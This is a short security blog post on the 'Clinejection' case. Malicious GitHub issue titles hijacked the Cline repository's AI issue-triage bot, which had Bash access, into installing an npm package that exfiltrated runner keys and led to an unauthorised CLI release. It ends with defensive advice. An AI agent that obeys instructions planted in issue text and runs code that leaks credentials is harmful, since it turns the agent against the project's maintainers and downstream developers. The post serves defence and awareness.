Sign in Subscribe

'Clinejection': spread a payload by opening an issue

Last updated on 
'Clinejection': spread a payload by opening an issue

Prompt injection (the technique of feeding a malicious text to a genAI tool that makes the tool perform an action on behalf of the attacker) is an unsolved problem. There is no foolproof method of preventing all prompt injection attacks, but there are some ways to limit the scope of such an attack. This is not one of those ways.

AI Agent given too many tools

From the writeup on snyk:

On February 9, 2026, security researcher Adnan Khan publicly disclosed a vulnerability chain (dubbed "Clinejection") in the Cline repository that turned the popular AI coding tool's own issue triage bot into a supply chain attack vector. Eight days later, an unknown actor exploited the same flaw to publish an unauthorized version of the Cline CLI to npm, installing the OpenClaw AI agent on every developer machine that updated during an eight-hour window.

This issue triage bot had a set of --allowedTools that included Bash, giving the AI agent arbitrary code execution on the Github Actions runner.

Toxic Flow

After creating an issue with a malicious title, the attacker could install an NPM package which contained a malicious pre-install script to exfiltrate keys from the runner context.

Snyk calls this "toxic flow":

...untrusted data flowing into an AI agent's context, combined with tool access that allows code execution, creating a "toxic flow" where the attacker controls what the agent does

How to protect from Toxic Flow

  1. Do not give AI agents in your CI/CD pipelines access to Bash, Write, or Edit permissions. Use the absolute minimum number of tools to perform the tasks you require.
  2. Limit the use of caching in your pipelines. If an attacker can poison your pipeline cache, they can increase the surface area of their attack.
  3. Use separate credentials for separate builds: dev, staging, nightly, production – none of these targets should share credentials.
  4. Never pipe user input into AI agent prompts: this is what causes the majority of injection attacks, and is the equivalent of SQL Injection using unescaped user strings.